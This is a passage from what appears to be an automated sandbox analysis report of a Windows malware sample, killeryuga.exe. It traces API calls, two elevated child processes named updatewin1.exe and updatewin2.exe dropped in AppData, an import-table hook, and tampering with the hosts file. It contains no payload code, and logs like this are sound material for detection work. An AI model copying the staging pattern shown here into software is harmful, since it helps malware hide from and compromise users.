Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsAlloc, address_out = 0x76c34f2b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsGetValue, address_out = 0x76c31252 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsSetValue, address_out = 0x76c34208 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsFree, address_out = 0x76c3359f True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x77170fcb True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x77170fcb True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x77170fcb True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x77170fcb True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x77170fcb True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x77170fcb True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x77170fcb True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DecodePointer, address_out = 0x77169d35 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DecodePointer, address_out = 0x77169d35 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x77170fcb True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DecodePointer, address_out = 0x77169d35 True 1
Fn
File Open filename = STD_INPUT_HANDLE True 1
Fn
File Open filename = STD_OUTPUT_HANDLE True 1
Fn
File Open filename = STD_ERROR_HANDLE True 1
Fn
Environment Get Environment String - True 1
Fn
Data
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\killeryuga.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\killeryuga.exe, size = 260 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsProcessorFeaturePresent, address_out = 0x76c35235 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateToolhelp32Snapshot, address_out = 0x76c5735f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = Module32FirstW, address_out = 0x76c579f9 True 1
Fn
System Get Info type = Hardware Information True 249
Fn
Process #8: updatewin1.exe
Information Value
ID #8
File Name c:\users\5p5nrgjn0js halpmcxz\appdata\local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin1.exe
Command Line "C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin1.exe"
Initial Working Directory C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\
Monitor Start Time: 00:01:00, Reason: Child Process
Unmonitor End Time: 00:01:03, Reason: Self Terminated
Monitor Duration 00:00:02
OS Process Information
Information Value
PID 0x9ec
Parent PID 0x99c (c:\users\5p5nrgjn0js halpmcxz\desktop\killeryuga.exe)
Bitness 32-bit
Is Created or Modified Executable True
Integrity Level High (Elevated)
Username XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs 0x9F0, 0x9F4, 0x9F8, 0xA04, 0xA08
Memory Dumps
Name Start VA End VA Dump Reason PE Rebuilds Bitness Entry Points YARA Actions
buffer 0x00275000 0x00275FFF Marked Executable - 32-bit - False
updatewin1.exe 0x00400000 0x0044CFFF Forced - 32-bit - False
updatewin1.exe 0x00400000 0x0044CFFF Process Termination - 32-bit - False
Hook Information
Type Installer Target Size Information Actions
IAT private_0x0000000000260000:+0x16795 104. entry of updatewin1.exe 4 bytes kernel32.dll:GetConsoleCP+0x0 now points to pagefile_0x00000000007f0000:+0x77f6f6
Threads
Thread 0x9f0
Category Operation Information Success Count Logfile
System Get Time type = System Time, time = 2019-03-24 16:36:35 (UTC) True 1
Fn
System Get Time type = Ticks, time = 118685 True 1
Fn
System Get Time type = Performance Ctr, time = 18090393828 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsAlloc, address_out = 0x76c34f2b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsGetValue, address_out = 0x76c31252 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsSetValue, address_out = 0x76c34208 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsFree, address_out = 0x76c3359f True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x77170fcb True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x77170fcb True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x77170fcb True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x77170fcb True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x77170fcb True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x77170fcb True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x77170fcb True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DecodePointer, address_out = 0x77169d35 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DecodePointer, address_out = 0x77169d35 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x77170fcb True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DecodePointer, address_out = 0x77169d35 True 1
Fn
File Open filename = STD_INPUT_HANDLE True 1
Fn
File Open filename = STD_OUTPUT_HANDLE True 1
Fn
File Open filename = STD_ERROR_HANDLE True 1
Fn
Environment Get Environment String - True 1
Fn
Data
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin1.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin1.exe, size = 260 True 1
Fn
Module Load module_name = kernel32.dll, base_address = 0x76c20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateToolhelp32Snapshot, address_out = 0x76c5735f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = Module32FirstW, address_out = 0x76c579f9 True 1
Fn
System Get Time type = Ticks, time = 118716 True 1
Fn
System Get Time type = System Time True 249
Fn
Module Load module_name = kernel32.dll, base_address = 0x76c20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualAlloc, address_out = 0x76c31856 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualProtect, address_out = 0x76c3435f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualFree, address_out = 0x76c3186e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetVersionExA, address_out = 0x76c33519 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TerminateProcess, address_out = 0x76c4d802 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ExitProcess, address_out = 0x76c37a10 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetErrorMode, address_out = 0x76c31b00 True 1
Fn
System Get Info type = Operating System True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x76c20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateFileA, address_out = 0x76c353c6 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WriteFile, address_out = 0x76c31282 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlushFileBuffers, address_out = 0x76c3469b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CloseHandle, address_out = 0x76c31410 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateProcessA, address_out = 0x76c31072 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrcpyW, address_out = 0x76c53102 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateProcessW, address_out = 0x76c3103d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WaitForSingleObject, address_out = 0x76c31136 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateFileW, address_out = 0x76c33f5c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrlenA, address_out = 0x76c35a4b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WideCharToMultiByte, address_out = 0x76c3170d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = MultiByteToWideChar, address_out = 0x76c3192e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCommandLineW, address_out = 0x76c35223 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WriteConsoleW, address_out = 0x76c57aca True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetFilePointerEx, address_out = 0x76c4c807 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetConsoleMode, address_out = 0x76c31328 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DeleteFileA, address_out = 0x76c35444 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapReAlloc, address_out = 0x77171f6e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapSize, address_out = 0x77163002 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetProcessHeap, address_out = 0x76c314e9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LCMapStringW, address_out = 0x76c317b9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetStringTypeW, address_out = 0x76c31946 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetFileType, address_out = 0x76c33531 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetStdHandle, address_out = 0x76cb454f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrcatA, address_out = 0x76c52b7a True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrcpyA, address_out = 0x76c52a9d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetEnvironmentVariableA, address_out = 0x76c333a0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetShortPathNameA, address_out = 0x76c5594d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleFileNameA, address_out = 0x76c314b1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetConsoleCP, address_out = 0x76cd7bff True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetLastError, address_out = 0x76c311a9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FreeEnvironmentStringsW, address_out = 0x76c351cb True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetEnvironmentStringsW, address_out = 0x76c351e3 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCommandLineA, address_out = 0x76c351a1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCPInfo, address_out = 0x76c35189 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetOEMCP, address_out = 0x76c5d1a1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsValidCodePage, address_out = 0x76c34493 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = UnhandledExceptionFilter, address_out = 0x76c5772f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetUnhandledExceptionFilter, address_out = 0x76c387c9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcess, address_out = 0x76c31809 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TerminateProcess, address_out = 0x76c4d802 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsProcessorFeaturePresent, address_out = 0x76c35235 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = QueryPerformanceCounter, address_out = 0x76c31725 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcessId, address_out = 0x76c311f8 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentThreadId, address_out = 0x76c31450 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetSystemTimeAsFileTime, address_out = 0x76c33509 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = InitializeSListHead, address_out = 0x771694a4 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsDebuggerPresent, address_out = 0x76c34a5d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetStartupInfoW, address_out = 0x76c34d40 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleHandleW, address_out = 0x76c334b0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = RtlUnwind, address_out = 0x76c5d1c3 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = RaiseException, address_out = 0x76c358a6 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetLastError, address_out = 0x76c311c0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x77170fcb True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EnterCriticalSection, address_out = 0x771522b0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LeaveCriticalSection, address_out = 0x77152270 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DeleteCriticalSection, address_out = 0x771645f5 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = InitializeCriticalSectionAndSpinCount, address_out = 0x76c31916 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TlsAlloc, address_out = 0x76c349ad True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TlsGetValue, address_out = 0x76c311e0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TlsSetValue, address_out = 0x76c314fb True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TlsFree, address_out = 0x76c33587 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FreeLibrary, address_out = 0x76c334c8 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetProcAddress, address_out = 0x76c31222 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LoadLibraryExW, address_out = 0x76c3495d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetStdHandle, address_out = 0x76c351b3 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleFileNameW, address_out = 0x76c34950 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ExitProcess, address_out = 0x76c37a10 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleHandleExW, address_out = 0x76c34a6f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetACP, address_out = 0x76c3179c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapAlloc, address_out = 0x7715e026 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapFree, address_out = 0x76c314c9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FindClose, address_out = 0x76c34442 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FindFirstFileExW, address_out = 0x76c41811 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FindNextFileW, address_out = 0x76c354ee True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DecodePointer, address_out = 0x77169d35 True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x74d40000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegOpenKeyExW, address_out = 0x74d5468d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegCloseKey, address_out = 0x74d5469d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegCreateKeyExW, address_out = 0x74d540fe True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = SetSecurityDescriptorDacl, address_out = 0x74d5415e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = InitializeSecurityDescriptor, address_out = 0x74d54620 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegSetValueExW, address_out = 0x74d514d6 True 1
Fn
Module Load module_name = SHELL32.dll, base_address = 0x75fd0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = ShellExecuteExW, address_out = 0x75ff1e46 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetFolderPathW, address_out = 0x76055708 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = CommandLineToArgvW, address_out = 0x75fe9ee8 True 1
Fn
Module Load module_name = SHLWAPI.dll, base_address = 0x75340000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathAppendW, address_out = 0x753581ef True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathFileExistsA, address_out = 0x7537ad1a True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathRemoveFileSpecW, address_out = 0x75353248 True 1
Fn
Module Load module_name = msvcr100.dll, base_address = 0x749c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\msvcr100.dll, function = atexit, address_out = 0x749dc544 True 1
Fn
System Get Time type = System Time, time = 2019-03-24 16:36:36 (UTC) True 1
Fn
System Get Time type = Performance Ctr, time = 18121598718 True 1
Fn
Module Load module_name = api-ms-win-core-synch-l1-2-0, base_address = 0x0 False 1
Fn
Module Load module_name = kernel32, base_address = 0x0 False 1
Fn
Module Load module_name = kernel32, base_address = 0x76c20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = InitializeCriticalSectionEx, address_out = 0x76c34d28 True 1
Fn
Module Load module_name = api-ms-win-core-fibers-l1-1-1, base_address = 0x0 False 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsAlloc, address_out = 0x76c34f2b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsSetValue, address_out = 0x76c34208 True 1
Fn
Module Load module_name = api-ms-win-core-synch-l1-2-0, base_address = 0x0 False 1
Fn
Module Load module_name = kernel32, base_address = 0x0 False 1
Fn
Module Load module_name = kernel32, base_address = 0x76c20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = InitializeCriticalSectionEx, address_out = 0x76c34d28 True 1
Fn
Module Load module_name = api-ms-win-core-fibers-l1-1-1, base_address = 0x0 False 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsAlloc, address_out = 0x76c34f2b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsGetValue, address_out = 0x76c31252 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsSetValue, address_out = 0x76c34208 True 1
Fn
File Open filename = STD_INPUT_HANDLE True 1
Fn
File Open filename = STD_OUTPUT_HANDLE True 1
Fn
File Open filename = STD_ERROR_HANDLE True 1
Fn
Module Load module_name = api-ms-win-core-localization-l1-2-1, base_address = 0x0 False 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LCMapStringEx, address_out = 0x76cb47f1 True 1
Fn
Module Get Filename module_name = api-ms-win-core-localization-l1-2-1, process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin1.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin1.exe, size = 260 True 1
Fn
Environment Get Environment String - True 1
Fn
Data
Process Create process_name = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin1.exe, show_window = SW_SHOW True 1
Fn
Module Get Handle module_name = c:\users\5p5nrgjn0js halpmcxz\appdata\local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin1.exe, base_address = 0x400000 True 2
Fn
Module Load module_name = api-ms-win-appmodel-runtime-l1-1-2, base_address = 0x0 False 1
Fn
Module Get Handle module_name = mscoree.dll False 1
Fn
Process #9: updatewin2.exe
Information Value
ID #9
File Name c:\users\5p5nrgjn0js halpmcxz\appdata\local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin2.exe
Command Line "C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin2.exe"
Initial Working Directory C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\
Monitor Start Time: 00:01:01, Reason: Child Process
Unmonitor End Time: 00:01:03, Reason: Self Terminated
Monitor Duration 00:00:02
OS Process Information
Information Value
PID 0x9fc
Parent PID 0x99c (c:\users\5p5nrgjn0js halpmcxz\desktop\killeryuga.exe)
Bitness 32-bit
Is Created or Modified Executable True
Integrity Level High (Elevated)
Username XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0xa00
Memory Dumps
Name Start VA End VA Dump Reason PE Rebuilds Bitness Entry Points YARA Actions
buffer 0x004E5000 0x004E5FFF Marked Executable - 32-bit - False
updatewin2.exe 0x00400000 0x0044CFFF Forced - 32-bit - False
updatewin2.exe 0x00400000 0x0044CFFF Process Termination - 32-bit - False
Modified Files
Filename File Size Hash Values YARA Match Actions
C:\Windows\System32\drivers\etc\hosts 7.92 KB MD5: 360d265eddea8679c434a205f7ade7ad False
SHA1: e17d843f610e0283904e201195360525ae449a68
SHA256: 5a1597c0d29dd475e33cd8889d7d848037a8c17bad0f3daa022fb889e0db7ead
SSDeep: 96:vDZEurK9q3WlSyU0FXmGZll0TOHyF9fAHLmttA/ZKTKdIlMHqzoCGbXx:RrK9FU0FXmGZll06m9fAH6AhKTK9Cax
Threads
Thread 0xa00
Category Operation Information Success Count Logfile
System Get Time type = System Time, time = 2019-03-24 16:36:36 (UTC) True 1
Fn
System Get Time type = Ticks, time = 119434 True 1
Fn
System Get Time type = Performance Ctr, time = 18165961372 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsAlloc, address_out = 0x76c34f2b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsGetValue, address_out = 0x76c31252 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsSetValue, address_out = 0x76c34208 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsFree, address_out = 0x76c3359f True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x77170fcb True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x77170fcb True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x77170fcb True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x77170fcb True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x77170fcb True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x77170fcb True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x77170fcb True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DecodePointer, address_out = 0x77169d35 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DecodePointer, address_out = 0x77169d35 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x77170fcb True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DecodePointer, address_out = 0x77169d35 True 1
Fn
File Open filename = STD_INPUT_HANDLE True 1
Fn
File Open filename = STD_OUTPUT_HANDLE True 1
Fn
File Open filename = STD_ERROR_HANDLE True 1
Fn
Environment Get Environment String - True 1
Fn
Data
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin2.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin2.exe, size = 260 True 1
Fn
Module Load module_name = kernel32.dll, base_address = 0x76c20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateToolhelp32Snapshot, address_out = 0x76c5735f True 1
Fn
